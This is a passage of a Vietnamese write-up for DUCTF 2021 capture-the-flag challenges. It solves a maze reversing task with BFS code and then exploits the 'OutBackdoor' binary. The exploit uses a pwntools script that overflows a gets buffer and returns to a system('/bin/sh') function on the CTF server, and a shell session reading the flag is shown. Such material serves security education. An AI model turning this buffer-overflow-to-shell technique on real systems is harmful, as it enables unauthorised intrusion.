<p>Quay lại với hàm <code>sub_11E0</code>, trong block while, ta thấy <code>v1 = v4++</code> nên từng ký tự của chuỗi ban đầu nhập vào sẽ được duyệt đến hết, mỗi ký tự sẽ là một trong số <code>&quot;hjklx&quot;</code>.</p>
<p>Trong 4 cases đầu, ta thấy biến v6 được thêm bớt đi 1 hoặc 60, bằng biện pháp nghiệp vụ của mình thì chắc chắn đây là điều hướng trong mảng 2 chiều có 60 cột :))<br>Kiểm tra số lượng phần tử của mảng thì có 3600 &gt;&gt;&gt; Ma trận vuông 60 x 60<br>Với ‘h’ là qua trái, ‘j’ xuống, ‘k’ lên, ‘l’ phải. Các hướng di chuyển bị cấm thì phụ thuộc vào 4 bit cuối của dword_4080[v6] (&amp;1, &amp;2, &amp;4, &amp;8).<br>Ở trường hợp ‘x’ thì sẽ kiểm tra bit thứ 7 (&amp;0x80)</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v8 = (dword_4080[v6] &gt;&gt; <span class="number">4</span>) &amp; <span class="number">7</span>; <span class="comment">// Tương đương (dword_4080[v6] &gt;&gt; 4) % 8</span></span><br></pre></td></tr></table></figure>
<p>Sau đó kiểm tra <code>v8</code> có trong <code>v9</code> chưa với <code>sub_1196</code> sau đó gán vào <code>v9</code>, mỗi lần thành công tăng biến v7 lên và kiểm đến khi v7 == 8</p>
<p>Ta rút ra được kết luận là sẽ có một map 60x60 giá trị, cần phải đi qua 8 điểm đặc biệt để có thể hoàn thành challenge.</p>
<p>Dump mảng và bắt đầu code thôi :))</p>
<p><img src="/images/ductf2021/connect_the_dots_3.png"></p>
<p>Ở đoạn code sau thì mình sẽ lấy thông tin quan trọng về các hướng có thể đi được ở từng ô + những điểm đặc biệt lưu ra file:</p>
<figure class="highlight cpp"><figcaption><span>solve1.cpp</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;vector&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="keyword">int</span> map[<span class="number">3600</span>] = &#123;<span class="number">11</span>, <span class="number">10</span>, <span class="number">12</span>, <span class="number">9</span>, <span class="number">10</span>, <span class="number">10</span>, <span class="number">8</span>, ...&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    cout &lt;&lt; <span class="built_in"><span class="keyword">sizeof</span></span>(map)/<span class="built_in"><span class="keyword">sizeof</span></span>(map[<span class="number">0</span>]) &lt;&lt; endl;</span><br><span class="line">    vector&lt;vector&lt;<span class="keyword">int</span>&gt;&gt; saved;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">60</span>; i++) &#123;</span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">int</span> j = <span class="number">0</span>; j &lt; <span class="number">60</span>; j++) &#123;</span><br><span class="line">            <span class="keyword">if</span>(map[i * <span class="number">60</span> + j] &amp; <span class="number">0x80</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                saved.<span class="built_in">push_back</span>(&#123;i, j, map[i * <span class="number">60</span> + j]&#125;);</span><br><span class="line">                cout &lt;&lt; <span class="string">&quot;x&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(!(map[i * <span class="number">60</span> + j] &amp; <span class="number">8</span>))</span><br><span class="line">                cout &lt;&lt; <span class="string">&quot;^&quot;</span>;</span><br><span class="line">            <span class="keyword">if</span>(!(map[i * <span class="number">60</span> + j] &amp; <span class="number">4</span>))</span><br><span class="line">                cout &lt;&lt; <span class="string">&quot;&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">if</span>(!(map[i * <span class="number">60</span> + j] &amp; <span class="number">2</span>))</span><br><span class="line">                cout &lt;&lt; <span class="string">&quot;v&quot;</span>;</span><br><span class="line">            <span class="keyword">if</span>(!(map[i * <span class="number">60</span> + j] &amp; <span class="number">1</span>))</span><br><span class="line">                cout &lt;&lt; <span class="string">&quot;&lt;&quot;</span>;</span><br><span class="line">            cout &lt;&lt; <span class="string">&quot;\t&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">	    cout &lt;&lt; endl;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">auto</span> i : saved) &#123;</span><br><span class="line">		cout &lt;&lt; i[<span class="number">0</span>] &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; i[<span class="number">1</span>] &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; i[<span class="number">2</span>] &lt;&lt; endl;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Kết quả (đã lược bớt khúc trên)<br><img src="/images/ductf2021/connect_the_dots_4.png"></p>
<p>Vậy là có 8 điểm {11, 15}, {20, 35}, {24, 18}, {28, 54}, {35, 11}, {39, 34}, {48, 57}, {59, 45}. Tính giá trị của từng ô với <code>(dword_4080[v6] &gt;&gt; 4) &amp; 7;</code> thì có giá trị lần lượt là 0, 1, 2, 3, 4, 5, 6, 7 -&gt; đặt tên đỉnh theo thứ tự này luôn.</p>
<p>Bình thường thì chỉ cần tìm đường đi qua 8 đỉnh này là xong, nhưng vấn đề là qua theo thứ tự nào… Ở hàm <code>sub_11E0</code>:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">v5 = (<span class="keyword">unsigned</span> __int8)dword_4060[v8] ^ (dword_4060[v8] &gt;&gt; <span class="number">8</span>) &amp; v5;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> ( v5 != <span class="number">255</span> )</span><br><span class="line">      <span class="built_in">sub_1179</span>();</span><br></pre></td></tr></table></figure>

<p>Như vậy v5 quyết định thứ tự cho việc này. Ta có <code>dword_4060[] = &#123;65407, 60999, 31620, 5074, 27425, 53858, 20942, 3721&#125;;</code> Nhờ được ông @hungt1 brute force cho đoạn này nên có thứ tự các đỉnh là 6 -&gt; 3 -&gt; 7 -&gt; 5 -&gt; 1 -&gt; 4 -&gt; 0 -&gt; 2</p>
<p>Code thôi :))</p>
<figure class="highlight cpp"><figcaption><span>solve2.cpp</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fstream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;vector&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;algorithm&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line">vector&lt;vector&lt;string&gt;&gt; <span class="built_in">ARR</span>(<span class="number">60</span>, vector&lt;string&gt;(<span class="number">60</span>));</span><br><span class="line">vector&lt;vector&lt;<span class="keyword">bool</span>&gt;&gt; <span class="built_in">CHECK</span>(<span class="number">60</span>, vector&lt;<span class="keyword">bool</span>&gt;(<span class="number">60</span>));</span><br><span class="line"></span><br><span class="line">string path = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line">string global = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Thêm đỉnh (0, 0) ở vị trí bắt đầu</span></span><br><span class="line"><span class="keyword">int</span> data[][<span class="number">2</span>] = &#123;</span><br><span class="line">    &#123;<span class="number">0</span>, <span class="number">0</span>&#125;,</span><br><span class="line">    &#123;<span class="number">11</span>, <span class="number">15</span>&#125;,</span><br><span class="line">    &#123;<span class="number">20</span>, <span class="number">35</span>&#125;,</span><br><span class="line">    &#123;<span class="number">24</span>, <span class="number">18</span>&#125;,</span><br><span class="line">    &#123;<span class="number">28</span>, <span class="number">54</span>&#125;,</span><br><span class="line">    &#123;<span class="number">35</span>, <span class="number">11</span>&#125;,</span><br><span class="line">    &#123;<span class="number">39</span>, <span class="number">34</span>&#125;,</span><br><span class="line">    &#123;<span class="number">48</span>, <span class="number">57</span>&#125;,</span><br><span class="line">    &#123;<span class="number">59</span>, <span class="number">45</span>&#125;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">BFS</span><span class="params">(<span class="keyword">int</span> i_from, <span class="keyword">int</span> j_from, <span class="keyword">int</span> i_to, <span class="keyword">int</span> j_to, string temp = <span class="string">&quot;&quot;</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(i_from == i_to &amp;&amp; j_from == j_to) &#123;</span><br><span class="line">        <span class="keyword">if</span>(global == <span class="string">&quot;&quot;</span>)</span><br><span class="line">            global = temp;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            global = temp.<span class="built_in">size</span>() &lt; global.<span class="built_in">size</span>() ? temp : global;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(i_from &lt; <span class="number">0</span> </span><br><span class="line">        || i_from &gt;= <span class="number">60</span> </span><br><span class="line">        || j_from &lt; <span class="number">0</span> </span><br><span class="line">        || j_from &gt;= <span class="number">60</span> </span><br><span class="line">        || CHECK[i_from][j_from] == <span class="literal">true</span>) </span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">auto</span> st = ARR[i_from][j_from];</span><br><span class="line">    CHECK[i_from][j_from] = <span class="literal">true</span>;</span><br><span class="line">    <span class="keyword">if</span>(st.<span class="built_in">find</span>(<span class="string">&#x27;&gt;&#x27;</span>) != string::npos) &#123;</span><br><span class="line">        <span class="built_in">BFS</span>(i_from, j_from + <span class="number">1</span>, i_to, j_to, temp + <span class="string">&quot;l&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(st.<span class="built_in">find</span>(<span class="string">&#x27;&lt;&#x27;</span>) != string::npos) &#123;</span><br><span class="line">        <span class="built_in">BFS</span>(i_from, j_from - <span class="number">1</span>, i_to, j_to, temp + <span class="string">&quot;h&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(st.<span class="built_in">find</span>(<span class="string">&#x27;^&#x27;</span>) != string::npos) &#123;</span><br><span class="line">        <span class="built_in">BFS</span>(i_from - <span class="number">1</span>, j_from, i_to, j_to, temp + <span class="string">&quot;k&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(st.<span class="built_in">find</span>(<span class="string">&#x27;v&#x27;</span>) != string::npos) &#123;</span><br><span class="line">        <span class="built_in">BFS</span>(i_from + <span class="number">1</span>, j_from, i_to, j_to, temp + <span class="string">&quot;j&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    CHECK[i_from][j_from] = <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// File này chỉ gồm có các ký tự điều hướng lấy từ trên</span></span><br><span class="line">    <span class="function">ifstream <span class="title">ifs</span><span class="params">(<span class="string">&quot;input.txt&quot;</span>)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">60</span>; i++)</span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">int</span> j = <span class="number">0</span>; j &lt; <span class="number">60</span>; j++)</span><br><span class="line">            ifs &gt;&gt; ARR[i][j];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 6 -&gt; 3 -&gt; 7 -&gt; 5 -&gt; 1 -&gt; 4 -&gt; 0 -&gt; 2</span></span><br><span class="line">    <span class="keyword">int</span> pp[] = &#123;<span class="number">0</span>, <span class="number">7</span>, <span class="number">4</span>, <span class="number">8</span>, <span class="number">6</span>, <span class="number">2</span>, <span class="number">5</span>, <span class="number">1</span>, <span class="number">3</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span><br><span class="line">        global = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="built_in">BFS</span>(data[pp[i]][<span class="number">0</span>],data[pp[i]][<span class="number">1</span>],data[pp[i + <span class="number">1</span>]][<span class="number">0</span>],data[pp[i+<span class="number">1</span>]][<span class="number">1</span>]);</span><br><span class="line">        path += global + <span class="string">&quot;x&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    cout &lt;&lt; path.<span class="built_in">length</span>() &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; path;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Kết quả:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3566 lljhjjljljll...</span><br></pre></td></tr></table></figure>
<p>Độ dài vừa khít với buffer :)) bỏ vào chương trình và lấy flag thôi<br><strong>DUCTF{bfs_dfs_ffs_no_more_mazes_a8fb66c12cd}</strong></p>
<h3 id="4-OutBackdoor-Pwn"><a href="#4-OutBackdoor-Pwn" class="headerlink" title="4. OutBackdoor - Pwn"></a>4. OutBackdoor - Pwn</h3><p><img src="/images/ductf2021/outbackdoor.png"></p>
<p>Ta có hàm main như sau:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> v4; <span class="comment">// [rsp+0h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">buffer_init</span>(argc, argv, envp);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\nFool me once, shame on you. Fool me twice, shame on me.&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\nSeriously though, what features would be cool? Maybe it could play a song?&quot;</span>);</span><br><span class="line">  <span class="built_in">gets</span>(&amp;v4);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Hàm gets không kiểm tra số lượng đọc vào &gt;&gt;&gt; buffer overflow. Biến v4 ở vị trí $rbp-10h, suy ra offset là 0x10 + 8 = 24</p>
<p>Kiểm tra sơ bộ file:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">┌──(meka㉿meka)-[~/ductf]</span><br><span class="line marked">└─$ checksec ./outBackdoor                 </span><br><span class="line">[*] <span class="string">&#x27;/home/meka/ductf/outBackdoor&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<p>Bit NX đã được bật nên không thể áp shellcode vào được, xem qua danh sách function thì thấy có hàm outBackdoor:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">outBackdoor</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;\n\nW...w...Wait? Who put this backdoor out back here?&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Do PIE không được bật nên này là điển hình của dạng bài ret2ret luôn rồi :))</p>
<p>Dùng objdump để tìm địa chỉ của hàm này:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">➜  objdump -d outBackdoor| grep outBackdoor</span><br><span class="line marked">outBackdoor:     file format elf64-x86-64</span><br><span class="line">00000000004011d7 &lt;outBackdoor&gt;:</span><br></pre></td></tr></table></figure>

<p>Có địa chỉ 0x4011d7, overwrite thử $rip:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&quot;./outBackdoor&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(</span><br><span class="line">	fit(</span><br><span class="line">		&#123;<span class="number">24</span> : p64(<span class="number">0x4011d7</span>)&#125;</span><br><span class="line">	)</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>Kết quả: </p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">[+] Starting <span class="built_in">local</span> process <span class="string">&#x27;./outBackdoor&#x27;</span>: pid 1948</span><br><span class="line marked">[*] Switching to interactive mode</span><br><span class="line"></span><br><span class="line">Fool me once, shame on you. Fool me twice, shame on me.</span><br><span class="line"></span><br><span class="line">Seriously though, what features would be cool? Maybe it could play a song?</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">W...w...Wait? Who put this backdoor out back here?</span><br><span class="line">$ <span class="built_in">pwd</span></span><br><span class="line">/home/m3k4/ctf</span><br></pre></td></tr></table></figure>

<p>Vậy là chạy local được nhưng server thì gặp lỗi EOF, xem lại code ở hàm outBackdoor có:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>Có thể hàm system bị return quá sớm &gt;&gt;&gt; ngắt ở server. Dùng ROPgadget, tìm được gadget <code>0x401016 : ret</code> phù hợp cho việc này.<br>Quá trình attack diễn ra như sau:<br><img src="/images/ductf2021/outbackdoor_1.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&quot;./outBackdoor&quot;</span>)</span><br><span class="line">p = remote(<span class="string">&quot;pwn-2021.duc.tf&quot;</span>, <span class="number">31921</span>)</span><br><span class="line"></span><br><span class="line">RET_addr = <span class="number">0x401016</span></span><br><span class="line">outBackdoor_addr = <span class="number">0x4011d7</span></span><br><span class="line"></span><br><span class="line">p.sendline(</span><br><span class="line">	fit(</span><br><span class="line">		&#123;<span class="number">24</span> : p64(RET_addr) + p64(outBackdoor_addr)&#125;</span><br><span class="line">	)</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">[+] Starting <span class="built_in">local</span> process <span class="string">&#x27;./outBackdoor&#x27;</span>: pid 2404</span><br><span class="line marked">[+] Opening connection to pwn-2021.duc.tf on port 31921: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"></span><br><span class="line">Fool me once, shame on you. Fool me twice, shame on me.</span><br><span class="line"></span><br><span class="line">Seriously though, what features would be cool? Maybe it could play a song?</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">W...w...Wait? Who put this backdoor out back here?</span><br><span class="line">$ cat flag.txt</span><br><span class="line">DUCTF&#123;https://www.youtube.com/watch?v=XfR9iY5y94s&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>flag: DUCTF{<a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=XfR9iY5y94s%7D">https://www.youtube.com/watch?v=XfR9iY5y94s}</a></strong></p>
<h3 id="5-babygame-Pwn"><a href="#5-babygame-Pwn" class="headerlink" title="5. babygame - Pwn"></a>5. babygame - Pwn</h3><p><img src="/images/ductf2021/babygame.png"></p>
<p>Trước tiên là decompile hàm main</p>
<figure class="highlight cpp"><figcaption><span>main</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl __noreturn <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">init</span>(argc, argv, envp);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Welcome, what is your name?&quot;</span>);</span><br><span class="line">  <span class="built_in">read</span>(<span class="number">0</span>, NAME, <span class="number">0x20</span>uLL);</span><br><span class="line">  RANDBUF = <span class="string">&quot;/dev/urandom&quot;</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">print_menu</span>();</span><br><span class="line">      v3 = <span class="built_in">get_num</span>();</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">1337</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="built_in">game</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v3 &gt; <span class="number">1337</span> )</span><br><span class="line">    &#123;</span><br><span class="line">LABEL_10:</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;Invalid choice.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( v3 == <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">set_username</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">goto</span> LABEL_10;</span><br><span class="line">      <span class="built_in">print_username</span>();</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Kiểm tra thử biến <code>NAME</code></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.bss:<span class="number">00000000000040</span>A0 ; <span class="keyword">char</span> NAME[<span class="number">32</span>]</span><br><span class="line">.bss:<span class="number">00000000000040</span>A0 NAME            db <span class="number">20</span><span class="function">h <span class="title">dup</span><span class="params">(?)</span>           </span>; DATA XREF: main+<span class="number">26</span>↑o</span><br><span class="line">.bss:<span class="number">00000000000040</span>A0                                         ; set_username+<span class="number">1F</span>↑o ...</span><br><span class="line">.bss:<span class="number">00000000000040</span>C0                 <span class="keyword">public</span> RANDBUF</span><br><span class="line">.bss:<span class="number">00000000000040</span>C0 ; <span class="keyword">char</span> *RANDBUF</span><br><span class="line">.bss:<span class="number">00000000000040</span>C0 RANDBUF         dq ?                    ; DATA XREF: main+<span class="number">41</span>↑w</span><br><span class="line">.bss:<span class="number">00000000000040</span>C0                                         ; game+<span class="number">17</span>↑r</span><br></pre></td></tr></table></figure>

<p>Ta thấy có vấn đề như sau: <code>read(0, NAME, 0x20uLL);</code> đọc vào tối đa 32 bytes, nhưng nếu đọc hết 32 bytes thì NAME có thể không kết thúc bằng <code>\0</code>, dẫn đến việc lấn sang con trỏ RANDBUF trong memory.</p>
<figure class="highlight cpp"><figcaption><span>game</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">game</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  FILE *stream; <span class="comment">// [rsp+8h] [rbp-18h]</span></span><br><span class="line">  <span class="keyword">char</span> ptr[<span class="number">4</span>]; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = 